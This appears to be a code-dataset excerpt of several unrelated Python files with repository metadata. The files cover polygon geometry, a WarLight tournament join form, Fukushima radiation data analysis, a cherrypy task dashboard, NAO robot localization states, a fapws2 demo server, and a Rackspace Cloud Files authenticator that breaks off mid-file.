length of the rectangle of minimum area enclosing the `Polygon`, and the
`width` of the `Polygon` is then just the width of the same rectangle of
minimum area enclosing the `Polygon`. It's calculation is based on [Arnon1983]_.
"""
def distance(xi, yi, xj, yj, m):
bi = yi - m*xi
bj = yj - m*xj
return abs(bj - bi)/math.sqrt(m*m+1.)
v = self.vertices
n = len(v) - 1
j = 0
for i in range(n):
while Vector(v[i], v[i + 1]) * Vector(v[j], v[j + 1]) > 0:
j = (j + 1) % n
if i == 0:
k = j
while Vector(v[i], v[i + 1]).cross(Vector(v[k], v[k + 1])) > 0:
k = (k + 1) % n
if i == 0:
m = k
while Vector(v[i], v[i + 1]).dot(Vector(v[m], v[m + 1])) < 0:
m = (m + 1) % n
if abs(v[i].x - v[i + 1].x) < UNCERTAINTY:
d1 = abs(v[k].x - v[i].x)
d2 = abs(v[m].y - v[j].y)
elif abs(v[i].y - v[i + 1].y) < UNCERTAINTY:
d1 = abs(v[k].y - v[i].y)
d2 = abs(v[m].x - v[j].x)
else:
s = (v[i + 1].y - v[i].y)/(v[i + 1].x - v[i].x)
d1 = distance(v[i].x, v[i].y, v[k].x, v[k].y, s)
d2 = distance(v[j].x, v[j].y, v[m].x, v[m].y, -1./s)
Ai = d1*d2
if i == 0 or Ai < A:
A = d1*d2
res_d1 = d1
res_d2 = d2
return (res_d1, res_d2) if res_d1 > res_d2 else (res_d2, res_d1)
def has(self, point):
"""
Determine if `point` is inside `Polygon` based on the winding
number.
Parameters
----------
point : point-like
The `point` to test if it's included in `self` or not.
Returns
-------
out : {True, False}
`True` if the `point` is included in `self` (`wn` > 0), else
`False` (`wn` == 0).
Notes
-----
Winding number algorithm (C++ implementation):
http://geomalgorithms.com/a03-_inclusion.html
"""
# initialize the winding number
wn = 0
# be sure to convert point to Point
point = Point(point)
# loop through all of the vertices in the polygon (two by two)
for v1, v2 in zip(self.vertices[:-1], self.vertices[1:]):
if v1.y < point.y:
if v2.y > point.y:
# an upward crossing
if point.is_left((v1, v2)) > 0:
# point left of edge
wn += 1
else:
if v2.y <= point.y:
# a downward crossing
if point.is_left((v1, v2)) < 0:
# point right of edge
wn -= 1
# return
return wn > 0
def get_point_on_self(self, edge_no=None, frac=None):
"""
Return a random `Point` on the given `Segment`
defined by `edge_no`.
Parameters
----------
edge_no : int, optional
The index of the `edge` from the edge list. Default is
`edge_no` = 0, which means the calculate on first edge.
frac : float, optional
A number in the open interval (0, 1). The point will be
placed on the edge with the edge number edge_no and
relative to the first point in the specified edge. If
left to default (`None`), a random `Point` will be
returned on the specified edge.
Returns
-------
out : point
The `Point` on this edge (`Segment`).
"""
segment = self.edges[edge_no]
return segment.get_point_on_self(frac)
def divide(self, obj=None, edge_no=None, frac=None, relative_phi=None,
drelative_phi=0):
"""
Divide the `Polygon`.
Parameters
----------
obj : line-like, optional
If no `obj` is given then `edge_no` is used to build a `Ray`
from a randomly chosen Point on `self.edges[edge_no]` with
inward direction and the closest intersection `Point` to
`Ray.p1` is used to divide the `Polygon` in two, else all
of the points given by the intersection between the
`Polygon` and `obj` are used to split the
`Polygon` in any number of polygons.
edge_no : int, optional
If given, `self.edges[edge_no]` will be used to build a
`Ray` as explained above, else a random edge number will
be chosen.
frac : float, optional
If given the point on `self.edges[edge_no]` will be situated at
the fraction `frac` between `self.edges[edge_no].p1` and
`self.edges[edge_no].p2` relateive to p1. Must be in the open
interval (0, 1).
relative_phi : float, optional
Is an angle (in degrees) that gives the direction of the
`Ray` spawned from `self.edges[edge_no]`. It has to be in
the open interval (0, 90). If not given a random direction will be
choosed in the interval (0, 90).
drelative_phi : float, optional
Is an angle interval centered on `relative_phi` which is used to
calculate a random relative direction for the `Ray`
spawned from `self.edges[edge_no]` in the interval `[relateive_phi -
drelative_phi/2, relative_phi + drelative_phi/2)`. If not given
it's assumed to be 0.
Returns
-------
ret : tuple of size 2
The first element is a list with the newly created polygons and
the second element in the tuple is another list with the
`Segments` that were used to divide the initial `Polygon`
(ie. the common edge between the newly created polygons). These
lists can be of length 0 if no division took place.
See also
--------
Polygon.get_point_on_self, Segment.get_point_on_self
"""
# final list of polygons
polys = []
division_segments = []
input_obj = obj
if input_obj:
# if a Line-like is given then calculate the intersection
# Points with all the edges for later use
intersections = input_obj.intersection(self)
else:
# WARNING:
# -------
# This only works for non intersecting Polygons
# select a random edge number and get a random Point
# on that edge to create a random Ray. This is used
# to build an intersection Points list with only two points
# the randomly generated Point and the Point closest to
# the randomly generated one. This works becase we are
# careful to generate a Ray only to the right of the segment
if edge_no is None:
edge_no = random.randint(0, len(self.edges) - 1)
random_point = self.get_point_on_self(edge_no, frac)
# generate a random angle to create a Ray which will be pointing
# always in the right of the selected edge
edge = self.edges[edge_no]
if relative_phi and not (0 <= relative_phi + drelative_phi <= 180):
raise ValueError('This has to hold: 0 <= relateive_phi +'
' drelative_phi <= 180, but got:'
' relative_phi={}, drelative_phi={}'
.format(relative_phi, drelative_phi))
if not relative_phi:
phi = edge.phi + math.pi*random.random()
else:
phi = edge.phi + math.radians(relative_phi + \
drelative_phi*random.random())
obj = Ray(random_point, Vector(1, phi, coordinates='polar'))
intersections = obj.intersection(self)
# and finally get the randomly generated Point + the first
# intersection Point in the sorted list
intersections = [[obj.p1, edge_no], intersections[0]]
if edge_no > intersections[1][1]:
# sort by edge_no if necessary
intersections = [intersections[1], intersections[0]]
# place the intersection Points in right positions in the new
# vertex listand replace the edge number with the new location
# (basically creating a new edge and pointing to that)
all_vertices = self.vertices[:-1]
# count is to hold how many vertices we already added in new list
# so that the edge's number can be appropriately updated
count = 0
for item in intersections:
# the position where the intersection Point will be inserted
idx = item[1] + count + 1
item[1] = idx
if item[0] == self.vertices[idx - count - 1]:
# if the intersection point coincides with the Point on the
# Polygon behind the insertion Point then we just skip the
# intersection Point, but alter the edge number in intersections
# accordingly
item[1] -= 1
continue
if item[0] == self.vertices[idx - count]:
# if the intersection point coincides with the Point on the
# Polygon after the insertion Point then we just skip
# everything
continue
all_vertices.insert(idx, item[0])
# store the new position
# increase the counter to account for the addition of the Point
count += 1
# sort the Points first from top to bottom (inverse on Y) and
# from left to right (on X) because this is the way the intersection
# Points are used in the algorithm
if abs(obj.p1.x - obj.p2.x) < UNCERTAINTY:
# find if the `Line`-like is vertical and if so then
# sort over Y
intersections.sort(key=lambda item: item[0].y)
else:
intersections.sort(key=lambda item: item[0].x)
# only after creating all_vertices list we can take care of the
# different cases that we have regarding Segmet, Ray etc. usage
if input_obj:
if (type(obj) is Segment) and (self.has(obj.p1) and \
self.has(obj.p2)):
# remove first and last Points from intersection list
# because the Segment has the end Points inside the Polygon
del (intersections[0], intersections[-1])
elif (type(obj) is Segment and (self.has(obj.p1) and \
not self.has(obj.p2))) or (type(obj) is Ray and \
self.has(obj.p1)):
# remove only the point closest to obj.p1 since this point is
# inside the Polygon
if (obj.p1.is_left(obj.p2)):
del intersections[0]
else:
del intersections[-1]
elif (type(obj) is Segment) and (not self.has(obj.p1) and \
self.has(obj.p2)):
# same as before except for obj.p2 now
if obj.p2.is_left(obj.p1):
del intersections[-1]
else:
del intersections[0]
if intersections is None or len(intersections) < 2:
# if we have less than two intersection Points return None
return polys, division_segments
# make separate lists for intersection Points and edges' number for
# further processing
intersection_points, edge_nos = map(list, zip(*intersections))
# keep track of used slices
slice_to_del = []
# loop over the edge_nos two at a time to construct Polygons
# determined by the intersection Points and contained within these
# then store the slice to be removed, ie. the portion of all_vertices
# without the interseciton Points. Example:
# * if we have a polygon defined by [p0, i0, p1, i1, p2, p3]
# * then edge_nos must be: [1, 3] (not necessarily in this order)
# * first get the Polygon defined by [i0, p1, i1] then remove these
# * Points from the list and we end up with the remaining Polygon
# * [p0, i0, i1, p2, p3]
for i, j in zip(edge_nos[:-1:2], edge_nos[1::2]):
if i > j:
i, j = j, i
polys.append(Polygon(all_vertices[i:j+1]))
division_segments.append(Segment(all_vertices[i], all_vertices[j]))
# insert always at the begining because we have to delete them
# in inverse order so that the slices make sense when selecting
# the items from the list
slice_to_del.insert(0, slice(i+1, j))
for sl in slice_to_del:
del all_vertices[sl]
# here append the remaining Polygon
polys.append(Polygon(all_vertices))
return polys, division_segments
UTF-8
Python
false
false
2,014
5,033,701,708,377
3379b93ddead581b484415e1d00cbbd4229f7d90
bb4beabace9d6ca3aa1fa281706e340a955cb493
/join.py
dad207e76eea4421b698c4d6f15329b39a40ad18
[]
no_license
osbert-lancaster-v/CLOT
https://github.com/osbert-lancaster-v/CLOT
a59e2caf2853f3e72913ef1a380a52ed9133c47a
46c31eb11ed3fd78c9b07c74d0e0ddb8328ad475
refs/heads/master
2020-12-25T05:34:34.010997
2013-01-14T18:47:31
2013-01-14T18:47:31
7,272,240
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import os
from google.appengine.ext import db
from google.appengine.ext.db import djangoforms
import django
from django.utils import simplejson as json
import logging
from django import http
from django import shortcuts
from django import newforms as forms
import main
import players
##from django.utils.encoding import smart_str, smart_unicode #needed for non-unicode characters
class JoinForm(forms.Form):
inviteToken = forms.CharField(label="Invite Token")
tourney_id = forms.CharField(label="tourney_id")
tourney_password = forms.CharField(label="tourney_password (enter only if it is required)",required=False)
def go(request):
"""Create a player. GET shows a blank form, POST processes it."""
logging.info('in join.go')
form = JoinForm(data=request.POST or None)
#now deal with the form etc
if not request.POST:
return shortcuts.render_to_response('join.html', {'form': form})
if not form.is_valid():
return shortcuts.render_to_response('join.html', {'form': form})
#see if we are letting more players join.
tourney_id = int(form.clean_data['tourney_id'])
tourney_clotconfig = main.getClotConfig(tourney_id)#.run(batch_size=1000)
if not tourney_clotconfig:
form.errors['tourney_id'] = 'tourney_id is invalid.'
return shortcuts.render_to_response('join.html', {'form': form})
players_are_gated_q = False
if main.arePlayersGated(tourney_id, tourney_clotconfig):
players_are_gated_q = True
logging.info('players_are_gated_q = '+str(players_are_gated_q))
return http.HttpResponseRedirect('/players_are_gated')
if players.numPlayersParticipating(tourney_id) >= main.getMaximumNumberOfPlayers(tourney_id, tourney_clotconfig):
logging.info('too many players')
return http.HttpResponseRedirect('/cannot_join')
inviteToken = form.clean_data['inviteToken']
#Call the warlight API to get the name, color, and verify that the invite token is correct
apiret = main.hitapi('/API/ValidateInviteToken', { 'Token': inviteToken })
if not "tokenIsValid" in apiret:
form.errors['inviteToken'] = 'The supplied invite token is invalid. Please ensure you copied it from WarLight.net correctly.'
return shortcuts.render_to_response('join.html', {'form': form})
tourney_password = str(form.clean_data['tourney_password'])
if main.getIfRequirePasswordToJoin(tourney_id, tourney_clotconfig):
if tourney_password != main.getTourneyPassword(tourney_id, tourney_clotconfig):
form.errors['tourney_password'] = 'The supplied tourney_password is required but is not correct. Please type the correct password for this tourney.'
return shortcuts.render_to_response('join.html', {'form': form})
#Ensure this invite token doesn't already exist
existing = players.Player.all().filter('inviteToken =', inviteToken).filter("tourney_id =", tourney_id).get()
if existing:
#If someone tries to join when they're already in the DB, just set their isParticipating flag back to true
existing.isParticipating = True
existing.save()
return http.HttpResponseRedirect('tourneys/' + str(tourney_id) + '/player/' + str(existing.key().id()))
data = json.loads(apiret)
player_name = data['name']
if type(data['name']) is unicode:
logging.info('dealing with unicode player name ...')
player_name = player_name.encode('ascii','ignore') #this deals with special characters that would mess up our code, by removing them.
logging.info('player_name:')
logging.info(player_name)
logging.info('player-name looks ok or not?')
player = players.Player(inviteToken=inviteToken, name=player_name, color=data['color'], isMember=data['isMember'].lower() == 'true')
if main.getIsMembersOnly(tourney_id, tourney_clotconfig) and not player.isMember:
form.errors['inviteToken'] = 'This site only allows members to join. See the Membership tab on WarLight.net for information about memberships.'
return shortcuts.render_to_response('join.html', {'form': form})
player.put()
player.player_id = str(player.key().id())
player.tourney_id = tourney_id
player.save()
logging.info("Created player")
logging.info(player)
return http.HttpResponseRedirect('tourneys/' + str(tourney_id) + '/player/' + str(player.key().id()))
#def join_Redirect
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from scipy import stats
import statsmodels.api as sm
import scipy, scipy.stats
from sklearn.cluster import KMeans
def getData(original_filename, modified_filename):
if os.path.isfile(modified_filename):
df = pd.read_csv(modified_filename)
else:
reader = pd.read_csv(original_filename , iterator = True, chunksize = 10000)
# Filter for all the readings between dates 03-01-2012 to 03-31-2012.
# Set Captured time as index
reader = [chunk[(chunk['Captured Time']>'2012-03-01') & (chunk['Captured Time']<'2012-03-31')] for chunk in reader]
df = pd.concat(reader)
# Filter for all the readings from within 100 km of the Fukushima Diaichi Nuclear plant
df['Distance To Fukushima in Km'] = df.apply( distanceToF, axis = 1)
df = df[df['Distance To Fukushima in Km'] <= 100]
# Write to csv file
df.to_csv(modified_filename)
return df
def distanceToF(x):
R = 6373.0 # Earth's radius in Km
lat_Fukishima = np.radians(37.421003)
lon_Fukishima = np.radians(141.033206)
lat = np.radians(x['Latitude'])
lon = np.radians(x['Longitude'])
dist_lon = lon - lon_Fukishima
dist_lat = lat - lat_Fukishima
a = (np.sin( dist_lat / 2)) ** 2 + np.cos( lat) * np.cos( lat_Fukishima) * ( np.sin( dist_lon / 2)) ** 2
c = 2 * np.arctan2( np.sqrt( a), np.sqrt( 1 - a))
distance = R * c # result in kilometers
return distance
def Fstat_pval(y,y_hat):
dfn = 1
dfd = len(y) - dfn - 1
MSM = (1/dfn) * (y - y.mean()).sum()
MSE = (1/dfd) * (y - y_hat).sum()
F = MSM / MSE
p = 1.0 - scipy.stats.f.cdf(F,dfn,dfd)
return p
# Load data for large files
original_filename = "/Users/" + os.getlogin() + "/Desktop/measurements.csv"
modified_filename = "/Users/" + os.getlogin() + "/Desktop/measurements_modified.csv"
df = getData(original_filename, modified_filename)
df = df.set_index('Captured Time')
# Show head of data frame
print(df.head())
# Plot distance to Fukushima vs Radiation level
plt.figure()
df.plot( x = 'Distance To Fukushima in Km', y = 'Value', style = 'o', label='All loaders')
plt.xlabel( 'Distance To Fukushima in Km' )
plt.ylabel( 'Value in CPM' )
plt.axis( 'tight' )
namefig = "/Users/" + os.getlogin() + '/Desktop/Distance_vs_Radiation.png'
plt.savefig(namefig, bbox_inches='tight')
# Box Cox transform on the data
df['Value transf'], lambd = stats.boxcox(df['Value'])
# Check that there is only one radioactivity measure unit
print(pd.unique(df.Unit.ravel()))
# Make plots, using the box-cox transformed data
plt.figure()
df.plot( x = 'Distance To Fukushima in Km', y = 'Value transf', style = 'o', label='All loaders')
plt.xlabel( 'Distance To Fukushima in Km' )
plt.ylabel( 'Value in CPM (box cox transform)' )
plt.axis( 'tight' )
namefig = '/Users/' + os.getlogin() + '/Desktop/Distance_vs_Radiation_Box_Cox.png'
plt.savefig(namefig, bbox_inches='tight')
# OLS fit for radiation level as a function of distance from the plant
X = df[ 'Distance To Fukushima in Km']
X = sm.add_constant(X)
y = df['Value transf']
model = sm.OLS( y , X)
result = model.fit()
# Print summary of OLS fit
print(result.summary())
# Plot regression line
y_hat = result.predict(X)
plt.plot(X, y_hat, 'r', alpha=0.9)
# Check which Loader IDs have values that don't fit the model well
alpha = 0.05
group_Loader_ID = df.groupby('Loader ID')
list_outliers_Loader_ID = []
# Loop over each group
for key , gp in group_Loader_ID:
# Compute p value for how the model computed in total dataset fits this group
gp = gp.sort('Distance To Fukushima in Km')
X = gp['Distance To Fukushima in Km']
X = sm.add_constant(X)
y = gp['Value transf']
y_hat = result.predict(X)
p_value = Fstat_pval(y,y_hat)
if p_value > alpha:
list_outliers_Loader_ID.append(key)
# Plot data for outlier Loader IDs to visually inspect our results
plt.figure()
gp.plot( x = 'Distance To Fukushima in Km', y = 'Value transf', style = 'o', label='Loader ID %s, p_val = %f' % (key,p_value))
plt.xlabel('Distance To Fukushima in Km')
plt.ylabel('Value in CPM')
plt.axis('tight')
namefig = '/Users/' + os.getlogin() + 'Desktop/Loader_ID_%s.png' % key
plt.savefig(namefig, bbox_inches = 'tight')
print("This is the list of outlier Loader ID's:")
print(list_outliers_Loader_ID)
# Perform kmeans clustering
data_for_cluster = df[['Distance To Fukushima in Km', 'Value transf']]
data_for_cluster = np.asarray(data_for_cluster)
kmeans = KMeans(init = 'k-means++' , n_clusters = 10 , n_init = 10)
kmeans.fit(data_for_cluster)
# Plot the decision boundary of the clusters. Create a mesh
x_min, x_max = data_for_cluster[:, 0].min() , data_for_cluster[:, 0].max()
y_min, y_max = data_for_cluster[:, 1].min() , data_for_cluster[:, 1].max()
xx, yy = np.meshgrid(np.arange(x_min, x_max, 1), np.arange(y_min, y_max, 0.05))
# Get labels for points in mesh
Z = kmeans.predict(np.c_[xx.ravel(), yy.ravel()])
Z = Z.reshape(xx.shape)
# Plot mesh
plt.figure()
plt.imshow( Z, interpolation = 'nearest', extent = (x_min, x_max, y_min, y_max),
cmap = plt.cm.Paired, aspect = 'auto', origin = 'lower')
plt.plot(data_for_cluster[:, 0], data_for_cluster[:, 1], 'k.', markersize = 2)
# Plot the centroids
centroids = kmeans.cluster_centers_
plt.scatter(centroids[:, 0], centroids[:, 1], marker = 'x',
linewidths = 5, color = 'y', zorder = 10)
plt.title('K-means clustering on the dataset')
plt.xlim(x_min, x_max)
plt.ylim(y_min, y_max)
namefig = '/Users/' + os.getlogin() + '/Desktop/Region_clusters.png'
plt.savefig(namefig, bbox_inches = 'tight')
# Add kmeans labels as a column to data frame. Since labels are assigned randomly,
# we re-name the labels so that Region 0 is the closest one to the plant, followed by Region 1, etc.
df['Cluster Labels'] = kmeans.labels_
centroids_x_axis = centroids[:, 0]
sort_index = np.argsort(centroids_x_axis)
for label in range(0,10):
df.loc[df['Cluster Labels']==label, 'Cluster Labels'] = 'Region %s' % sort_index[label]
# Plot a time series and histogram for each Region
for label in range(0,10):
ts = df[ df['Cluster Labels'] == 'Region %s' %label]['Value']
ts = ts.sort_index()
plt.figure()
ts.plot()
pd.rolling_mean(ts, 100).plot(style = 'k--', linewidth = 5)
locs, labels = plt.xticks()
plt.setp(labels, rotation=30)
plt.title('Time series for Region %s'%label)
namefig = '/Users/' + os.getlogin() + 'Desktop/Region_%s_timeseries.png' % label
plt.savefig(namefig, bbox_inches='tight')
plt.figure()
ts.hist()
plt.title('Histogram for Region %s'%label)
namefig = '/Users/' + os.getlogin() + 'Desktop/Region_%s_histogram.png' % label
plt.savefig(namefig, bbox_in ches='tight')
UTF-8
Python
false
false
2,014
6,021,544,149,745
71d5006df5e8a7db19a19f58150c976b43744dc9
38f6f5ce0a9f697a7f4c9b405773db4ad69fa63f
/lgTask/cherrypy/lgTaskRoot.py
3402eff05bef017c590e0f7c013d6979e2487373
[]
no_license
wwoods/lamegame_tasking
https://github.com/wwoods/lamegame_tasking
87b672aa903387fac581bf6e69a740822500887f
df2f132d0d9c62f48e171c8c2c60ba602e84b89c
refs/heads/master
2020-06-03T04:28:59.277429
2013-03-19T00:57:17
2013-03-19T00:57:17
2,810,622
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import cherrypy
import datetime
import lgTask
from lgTask.cherrypy.staticServer import StaticServer
from lgTask.lib.timeInterval import TimeInterval
import os
from controls import *
class TaskView(Control):
template = """<h2>{title}</h2>{children}"""
# Define these so they go to class args rather than kwargs
query = None
sort = None
limit = None
conn = None
showKill = False
def build(self):
# Run query, fill in table!
tasks = self.conn._database[self.conn.TASK_COLLECTION].find(
self.query
, sort = self.sort
, limit = self.limit
)
cells = [ ('taskClass', 'Task Class')
, ('kwargs', 'Task Kwargs')
, ('state', 'State')
, ('tsStart', 'Started')
, ('tsStop', 'Stopped'), ('lastLog', 'Last Log') ]
cols = len(cells) + 1
if self.showKill:
cols += 1
table = Table(cols)
if self.showKill:
table.add_cell(TextControl(text = 'kill'))
table.add_cell(TextControl(text = 'Task ID'))
for c in cells:
table.add_cell(TextControl(text = c[1]))
for t in tasks:
i = t['_id']
if self.showKill:
table.add_cell(LiteralControl(
html = '<a href="killTask?id={0}">kill</a>'.format(i)))
table.add_cell(LiteralControl(
html = '<a href="taskLog?id={0}">{0}</a>'.format(i)))
for c in cells:
table.add_cell(TextControl(text = str(t.get(c[0], ''))))
self.append(table)
class LgTaskRoot(object):
"""Cherrypy-based object for serving up stats about a cluster of lgTask
processors.
"""
static = StaticServer(
os.path.join(
os.path.dirname(os.path.abspath(__file__))
, 'static'))
def __init__(self, connection):
"""Creates a root object capable of serving up information about the
given lgTask.Connection and its processors.
"""
self._conn = connection
@cherrypy.expose
def index(self):
body = LgTaskPage()
body.append(TaskView(
title = 'Recently Failed Tasks'
, conn = self._conn
, query = dict(
state = 'error'
, tsStop = {
'$gt': datetime.datetime.utcnow() - TimeInterval('7 days')
}
)
, sort = [ ('tsStop', -1 ) ]
, limit = 10
))
body.append(TaskView(
title = 'Oldest Running Tasks'
, conn = self._conn
, query = dict(
state = 'working'
)
, sort = [ ('tsRequest', 1 ) ]
, limit = 10
, showKill = True
))
body.append(TaskView(
title = 'Upcoming Tasks'
, conn = self._conn
, query = dict(
state = 'request'
)
, sort = [ ('tsRequest', 1 ) ]
, limit = 10
))
body.append(TaskView(
title = 'Recently Completed Tasks'
, conn = self._conn
, query = dict(
state = { '$in': lgTask.Connection.states.DONE_GROUP }
)
, sort = [ ('tsStop', -1 ) ]
, limit = 10
))
return body.gethtml()
@cherrypy.expose
def killTask(self, id):
"""Kill task with id"""
self._conn.killTask(id)
raise cherrypy.HTTPRedirect('../')
@cherrypy.expose
def taskLog(self, id):
"""Return the log for task with ID.
"""
blocks = []
while True:
block = self._conn.talkGetTaskLog(id, len(blocks))
blocks.append(block)
if len(block) == 0:
break
page = LgTaskPage()
page.append(LiteralControl(
html='<h1>Task {0}</h1><pre style="white-space:pre-wrap;">{1}</pre>'
.format(
id, ''.join(blocks))))
return page.gethtml()
UTF-8
Python
false
false
2,013
1,511,828,533,838
2d25d13a278c97050d731b5e9a82d109795e2998
d4a8b8e6dd996ef8889407d0e6f577f63de0062a
/noggin/players/LocStates.py
65d0043c53248aa49d4a3156c8e115c992ad0d50
[
"GPL-3.0-only",
"LGPL-3.0-only"
]
non_permissive
burst/nao-man
https://github.com/burst/nao-man
f1821aee28f14a4c2a56ff3bb2a0da0d73d29001
3bd95e01560cfb46492be260e5ca1979ca6239e5
refs/heads/master
2021-01-18T04:07:33.657770
2009-04-20T06:12:52
2009-04-20T06:12:52
182,038
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import man.motion.SweetMoves as SweetMoves
import man.noggin.NogginConstants as NogginConstants
SPIN_TIME = 360
WAIT_TIME = 45
WALK_TIME = 200
TARGET_X = NogginConstants.OPP_GOALBOX_LEFT_X
TARGET_Y = NogginConstants.CENTER_FIELD_Y
def gamePlaying(player):
#player.brain.loc.reset()
return player.goLater('goToPoint')
def spinLocalize(player):
if player.firstFrame():
player.brain.tracker.switchTo('locPans')
player.setSpeed(0,2,15)
if player.counter == SPIN_TIME:
player.stopWalking()
return player.goNow('waitToMove')
return player.stay()
def waitToMove(player):
if player.counter > WAIT_TIME:
return player.goNow('goToPoint')
return player.stay()
def goToPoint(player):
if player.firstFrame():
player.brain.tracker.switchTo('locPans')
player.brain.nav.goTo(TARGET_X, TARGET_Y)
return player.stay()
if player.brain.nav.isStopped():
return player.goLater('doneState')
return player.stay()
def walkForward(player):
if player.firstFrame():
player.setSpeed(4,0,0)
if player.counter > WALK_TIME:
return player.goLater('doneState')
return player.stay()
def doneState(player):
if player.firstFrame():
player.stopWalking()
player.brain.tracker.stopHeadMoves()
if player.brain.nav.isStopped():
return player.goLater('sitDown')
return player.stay()
def sitDown(player):
if player.firstFrame():
player.executeMove(SweetMoves.SIT_POS)
return player.stay()
if not player.brain.motion.isBodyActive():
player.gainsOff()
return player.goLater('doneDone')
return player.stay()
def doneDone(player):
return player.stay()
from settings_changeme import *
DEBUG = True
#Post Save Filters
POST_SAVE_FILTERS = [
("tardis.tardis_portal.filters.flexstation.make_filter",
["FLEXSTATION", "http://rmit.edu.au/flexstation"]), # Flexstation III filter
]
MIDDLEWARE_CLASSES += ('tardis.tardis_portal.filters.FilterInitMiddleware',)
UTF-8
Python
false
false
2,013
15,032,385,556,033
542116df6f72771417e4683b96c4664b5c14cd8c
99d5b87018e11979dd417fcf40686f92e7ee33ef
/sample/hello/hello_world.py
0e606d9a9bc4314d5354420c6c6590352e05646b
[
"MIT"
]
permissive
william-os4y/fapws2
https://github.com/william-os4y/fapws2
123a0b8cbb8cbe343ee6ab7a8a33f7b5ad664238
5752af742b763517ce0a52d0f0c00b40b186edf8
refs/heads/master
2020-05-31T08:20:53.247648
2008-12-23T13:18:00
2008-12-26T14:29:35
70,378
2
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
import _evhttp as evhttp
from fapws2 import base
import time
import sys
sys.setcheckinterval=100000 # since we don't use threads, internal checks are no more required
from fapws2.contrib import views, zip
def start():
evhttp.start("0.0.0.0", 8080)
#print evhttp.get_timeout()
#evhttp.set_timeout(3)
#print evhttp.get_timeout()
evhttp.set_base_module(base)
def generic(environ, start_response):
#print "GENERIC ENV",environ
return ["Page not found"]
@zip.Gzip()
def hello(environ, start_response):
#print "Header", environ
if environ["PATH_INFO"]!="":
return generic(environ, start_response)
#print "params",environ["fapws.params"]
#print "query",environ["QUERY_STRING"]
#time.sleep(1)
start_response('200 WHYNOT', [('toto',4444)])
return ["Hello World!!"]
def staticlong(environ, start_response):
try:
f=open("long.txt", "rb")
except:
f=["Page not found"]
return f
@zip.Gzip()
def staticlongzipped(environ, start_response):
try:
f=open("long.txt", "rb")
except:
f=["Page not found"]
return f
def staticshort(environ, start_response):
f=open("short.txt", "rb")
return f
def testpost(environ, start_response):
print "INPUT DATA",environ["wsgi.input"].getvalue()
return ["OK. params are:%s" % (environ["fapws.params"])]
class Test:
def __init__(self):
pass
def __call__(self, environ, start_response):
return ["Hello from Test"]
evhttp.http_cb("/hello",hello)
evhttp.http_cb("/longzipped", staticlongzipped)
evhttp.http_cb("/long", staticlong)
evhttp.http_cb("/short", staticshort)
t=Test()
evhttp.http_cb("/class", t)
staticform=views.Staticfile("test.html")
evhttp.http_cb("/staticform", staticform)
evhttp.http_cb("/testpost", testpost)
evhttp.http_cb("/",hello)
evhttp.gen_http_cb(generic)
evhttp.event_dispatch()
if __name__=="__main__":
start()
UTF-8
Python
false
false
2,008
13,013,750,912,620
717fe88225450195ba7fbd7679205780fb43e874
5b317b27771e6caec637948f1925310b96c7a7fd
/cloudfiles_storage/auth.py
5f844a383b434331b3ccb274ff52539fce37fdcf
[]
no_license
techresidents/trweb
https://github.com/techresidents/trweb
fc1a5bdb380c647174ff715d7491b69c4eae41b4
acd8b7b1837519e819c16bb732d08a9acebb60a4
refs/heads/master
2020-12-25T19:04:11.169009
2013-10-10T23:18:30
2013-10-10T23:18:30
19,194,341
0
1
null
null
null
null
null
null
null
null
null
null
null
null
null
import json
import re
import urlparse
from cloudfiles.errors import AuthenticationError, AuthenticationFailed, ResponseError
def parse_url(url):
(scheme, netloc, path, params, query, frag) = urlparse.urlparse(url)
# We only support web services
if not scheme in ('http', 'https'):
raise ValueError('Scheme must be one of http or https')
is_ssl = scheme == 'https' and True or False
# Verify hostnames are valid and parse optional port
match = re.match(r"([a-zA-Z0-9\-\.]+):?([0-9]{2,5})?", netloc)
if match:
(host, port) = match.groups()
if not port:
port = is_ssl and '443' or '80'
else:
raise ValueError('Invalid host and/or port: %s' % netloc)
return (host, int(port), path.strip('/'), is_ssl)
class CloudfilesAuthenticator(object):
def __init__(self,
username,
api_key=None,
password=None,
timeout=5,
auth_endpoint=None,
connection_class=None):
self.username = username
self.api_key = api_key
self.password = password
self.timeout = timeout
self.endpoint = auth_endpoint or "https://identity.api.rackspacecloud.com/v2.0"
self.connection_class = connection_class
if self.connection_class is None:
import httplib
if self.endpoint.startswith("https:"):
self.connection_class = httplib.HTTPSConnection
else:
self.connection_class = httplib.HTTPConnection
#parse endpoint
self.host, self.port, self.path, self.is_ssl = \
parse_url(self.endpoint)
#connection
self.connection = self.connection_class(
host=self.host,
port=self.port,
timeout=self.timeout)
def authenticate(self):
if self.api_key is not None:
response = self.authenticate_api_key(
username=self.username,
api_key=self.api_key)
elif self.password is not None:
response = self.authenticate_password(
username=self.username,
password=self.password)
else:
raise ValueError("api_key or password required.")
try:
default_region = response["access"]["user"]["RAX-AUTH:defaultRegion"]
auth_token = response["access"]["token"]["id"]
for service in response["access"]["serviceCatalog"]:
if service["name"] == "cloudFiles":
for endpoint in service["endpoints"]:
if endpoint["region"] == default_region:
cloudfiles_url = endpoint["publicURL"]
if service["name"] == "cloudFilesCDN":
for endpoint in service["endpoints"]:
if endpoint["region"] == default_region:
cloudfiles_cdn_url = endpoint["publicURL"]
return cloudfiles_url, cloudfiles_cdn_url, auth_token
except Exception as error:
raise AuthenticationError("Invalid response from authentication service: %s" \
% str(error))
def authenticate_api_key(self, username, api_key):
data = """
{
"auth": {
"RAX-KSKEY:apiKeyCredentials": {
"username": "%s",
"apiKey": "%s"
}
}
}
""" % (username, api_key)
headers = {
"Content-type": "application/json"
}
response = self.send_request("POST", "/tokens", data, headers)
result = json.loads(response.read())
return result
def authenticate_password(self, username=None, password=None):
data = """
{
"auth": {
"passwordCredentials": {
"username": "%s",
"password": "%s"
}
}
}
""" % (username, password)
headers = {
"Content-type": "application/json"
}
response = self.send_request("POST", "/tokens", data, headers)
result = json.loads(response.read())
return result
def default_headers(self, method, path, data):
headers = {
'Content-Length': str(len(data)),
}
return headers
def send_request(self, method, path, data=None, headers=None):
data = data or ""
user_headers = headers
headers = self.default_headers(method, path, data)
if user_headers is not None:
headers.update(user_headers)
path = "/%s/%s" % (self.path, path.strip("/"))
try:
self.connection.request(method, path, data, headers)
response = self.connection.getresponse()
self.validate_response(response)
except ResponseError as error:
if error.status == 401:
raise AuthenticationFailed(error.reason)
else:
raise
return response
def validate_response(self, response):
